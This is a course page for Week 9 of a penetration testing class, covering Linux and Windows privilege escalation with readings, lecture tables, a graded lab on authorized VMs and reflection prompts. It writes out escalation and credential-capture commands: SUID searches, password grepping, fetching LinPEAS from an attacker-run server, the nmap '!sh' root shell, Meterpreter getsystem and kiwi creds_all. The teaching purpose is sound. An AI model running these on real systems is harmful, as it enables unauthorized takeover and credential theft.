Classroom Glossary Public page

Week 9: Post-Exploitation and Privilege Escalation

1,438 words

Weidman writes: "Some say pentests truly begin only after exploitation, in the post-exploitation phase. You got in, but what does that intrusion really mean to the client?" A shell as a low-privilege service account is a finding. A shell as root or SYSTEM on a domain controller is a different finding entirely. This week bridges those two.

Reading (~1.5 hr)

Required:

  • Weidman, Penetration Testing, Chapter 13 ("Post Exploitation"), sections on local privilege escalation (getsystem, local escalation modules, UAC bypass), local information gathering, and lateral movement (covered more in Week 10). ~40 pages.
  • HP3, Chapter 4 ("The Drive -- Compromising the Network"), the privilege escalation sections (Linux and Windows). Peter Kim's red-team approach supplements Weidman with more current techniques (credential manager, LSASS memory, BloodHound/SharpHound for AD paths).

Supplementary:

  • GTFOBins (gtfobins.github.io) -- Reference for Unix binary privilege escalation techniques. Used in Linux privesc enumeration.
  • LOLBAS (lolbas-project.github.io) -- Reference for Windows "living off the land" privilege escalation techniques.

Lecture outline (~1 hr)

Part 1: What post-exploitation means (15 min)

Post-exploitation is everything after the initial foothold. It answers: what is the actual business impact of the compromise?

The post-exploitation phase covers:

  • Local privilege escalation: Elevate from the initial shell's privilege level to root (Linux) or SYSTEM (Windows)
  • Credential capture: Extract hashes, plaintext credentials, tokens, API keys from the compromised host
  • Local information gathering: Map the host's network interfaces, running processes, installed software, scheduled tasks, recent files
  • Persistence (optional for this course): Establish a mechanism to regain access; used in red-team engagements; requires explicit ROE authorization in professional work
  • Lateral movement (Week 10): Use the compromised host as a pivot to reach other systems on the network

The first post-exploitation question on every host: what privilege level is the initial shell running at?

# Linux:
id && whoami && hostname && uname -a
# Windows (Meterpreter):
sysinfo
getuid
getsystem  # attempt automatic privilege escalation

Part 2: Linux privilege escalation (25 min)

Linux privesc works by finding a path from the current user's capabilities to root. LinPEAS automates the enumeration; you must understand what each category means to prioritize the output.

Common Linux privesc technique families:

Technique What to look for Tool
SUID binaries Binaries with the SUID bit set run as the file owner (often root) regardless of who launches them. If the binary is in GTFOBins, there is a known privesc path. find / -perm -4000 -type f 2>/dev/null
Sudo misconfigurations sudo -l shows what the current user can run as root. If a binary is listed without a password requirement and is in GTFOBins, escalation is straightforward. sudo -l
Writable cron jobs Cron jobs running as root that reference writable scripts or directories. cat /etc/crontab; ls -la /etc/cron.*
World-writable service configs Service configuration files writable by the current user that are executed at elevated privilege. LinPEAS outputs
Outdated kernel (DirtyCow, etc.) Kernel exploits provide a reliable path but crash the system on failure. Use as a last resort on production. Lab use is appropriate. uname -r + CVE search
Password reuse / .bash_history Credentials in shell history, config files, scripts. cat ~/.bash_history; grep -r 'password' /home/ 2>/dev/null

LinPEAS workflow:

# Transfer LinPEAS to target:
# On Kali: python3 -m http.server 8080
# On target: wget http://<kali-ip>:8080/linpeas.sh && chmod +x linpeas.sh

# Run LinPEAS:
./linpeas.sh | tee linpeas-output.txt

# Read output:
# High-severity findings are highlighted in RED
# Medium-severity in YELLOW
# Check each category: SUID, sudo, cron, network, users, passwords

The Lab 9 deliverable requires you to annotate each LinPEAS finding with the technique family it belongs to and a one-sentence explanation of the escalation path. Do not paste raw LinPEAS output into a client report.

Part 3: Windows privilege escalation (20 min)

Windows privesc techniques differ from Linux but follow the same logic: find a path from the current user to SYSTEM.

Common Windows privesc technique families:

Technique What to look for Tool
Unquoted service path Service binaries specified without quotes and with spaces in the path. Windows may execute a binary planted in an intermediate directory. wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\\windows"
Writable service binary Current user can overwrite the service binary and the service runs as SYSTEM or a high-privilege account. WinPEAS output; icacls <service_binary>
DLL hijacking Application loads a DLL from a user-writable directory. Planting a malicious DLL with the same name causes it to load with the app's privilege. WinPEAS output; Procmon on the target
AlwaysInstallElevated Registry keys that allow MSI packages to install with elevated privilege. reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Token impersonation On older Windows builds, a user with SeImpersonatePrivilege (often service accounts) can escalate via token impersonation exploits (Juicy Potato, PrintSpoofer). whoami /priv; check for SeImpersonatePrivilege
Credential extraction (Mimikatz / kiwi) Windows stores credentials in LSASS memory. On Windows <= 2012 R2 without WDigest disabled, plaintext passwords are available. Meterpreter: load kiwi; creds_all

WinPEAS workflow:

# From a Meterpreter session on Metasploitable Windows target:
meterpreter > upload winpeas.exe C:\\Windows\\Temp\\winpeas.exe
meterpreter > execute -i -f C:\\Windows\\Temp\\winpeas.exe -a "-ansi" | tee winpeas-output.txt

Or run directly in a Windows shell:

winpeas.exe > winpeas-output.txt
type winpeas-output.txt

Meterpreter's getsystem shortcut:

meterpreter > getsystem

getsystem tries multiple techniques automatically (token impersonation, named pipe impersonation, reflective DLL injection). It is a useful first step on the lab; understanding what it tries matters more than whether it succeeds.

Lab 9: Privilege Escalation (~5 hr, graded)

See labs/lab-9-privesc.md for the full lab.

Targets: Metasploitable 2 (Linux privesc exercises) + lab Windows VM (Windows privesc exercises; instructor-provided).

Authorization note: All targets are the authorized lab range. Do not apply privesc techniques to any other system.

Linux privesc exercises (Metasploitable 2):

  1. Obtain an initial low-privilege shell (use any technique from Week 7 or a new one; document the initial foothold).
  2. Transfer and run LinPEAS. Save the full output.
  3. Identify at least two distinct privesc paths in the LinPEAS output. For each: name the technique family (SUID, sudo, cron, etc.), explain the escalation path in one sentence, and rate your confidence that it works.
  4. Execute one privesc path to achieve root. Screenshot: id showing uid=0(root).
  5. Annotate the LinPEAS finding that led to the successful escalation: what did LinPEAS flag, and what did the flag mean?

Windows privesc exercises (lab Windows VM):

  1. Obtain an initial shell with low privileges (instructor provides initial access credentials for a low-privilege user account).
  2. Transfer and run WinPEAS. Save the output.
  3. Identify at least two distinct privesc paths in the WinPEAS output. Annotate each with the technique family.
  4. Execute one privesc path to achieve SYSTEM. Screenshot: whoami showing nt authority\system.
  5. If Meterpreter session is available, run load kiwi; creds_all and document what credential material is accessible from a SYSTEM-level session.

Deliverable: Lab report with two sections (Linux and Windows). Each section: initial foothold description, LinPEAS / WinPEAS summary (annotated, not raw), the successful escalation steps, proof screenshot, and one paragraph on the business impact of achieving root/SYSTEM on this host.

Independent practice (~3 hr)

  • GTFOBins exercise (1 hr): Pick three binaries that appear in typical Metasploitable 2 SUID output (nmap, find, python). Look each one up on GTFOBins. Document: the exact command that achieves a shell or file read as root, and explain why the SUID bit makes this work.
  • WinPEAS interpretation (1 hr): Read the WinPEAS output from Lab 9 and identify one additional privesc path you did not exploit. Describe how you would exploit it (step by step) without running the exploit itself.
  • Reflection (1 hr): Write the reflection prompts below.

Reflection prompts

  1. LinPEAS colored Metasploitable 2's nmap binary RED under SUID findings. Look up the GTFOBins entry for nmap. The old interactive mode of nmap (nmap --interactive; !sh) provides a shell as root when nmap has the SUID bit. Why does SUID make this dangerous, and why does nmap ever need SUID in the first place? (What legitimate purpose did it serve that required elevated privileges?)

  2. You have root on Metasploitable 2. Weidman's post-exploitation chapter lists "collecting credentials" as one of the first activities after escalation. What credential material exists on a Linux system at root level that is not available to a non-root user? Name three specific files or locations and explain why each is sensitive.

  3. The getsystem command in Metasploit tries multiple techniques automatically, including named-pipe impersonation and token duplication. A real-world defender can detect getsystem by monitoring for suspicious named pipe creation or token duplication events. What does this imply about the trade-off between automation (getsystem is one command) and stealth (manual techniques are slower but less detectable)? How would the ROE influence your choice on a real engagement?

Toolchain Diary: Week 9 additions

  • LinPEAS -- Linux Privilege Escalation Awesome Script. Enumerate dozens of escalation-path categories in a single run. Read before running; read the output carefully. Source: github.com/carlospolop/PEASS-ng.
  • WinPEAS -- Windows Privilege Escalation Awesome Script. Windows equivalent of LinPEAS. Output is color-coded in a terminal that supports ANSI codes; use -ansi flag on modern Windows.
  • GTFOBins (gtfobins.github.io) -- Reference for Unix binaries with known privilege escalation paths (SUID, sudo, cron). Indexed by binary name; each entry has the exact command.
  • LOLBAS (lolbas-project.github.io) -- Windows equivalent of GTFOBins. "Living off the land" binaries that can be abused without installing attacker tooling.
  • Meterpreter kiwi module -- Mimikatz integrated into Meterpreter. load kiwi; creds_all extracts NTLM hashes, plaintext passwords (if WDigest is enabled), and Kerberos tickets from LSASS memory on Windows.

What's next

Week 10 is lateral movement: using the credentials, sessions, and network access from Week 9 to reach other hosts inside the authorized lab network. Credential reuse, pass-the-hash, pivoting, and scope discipline. The multi-host engagement transcript from Lab 10 is a direct rehearsal for the capstone.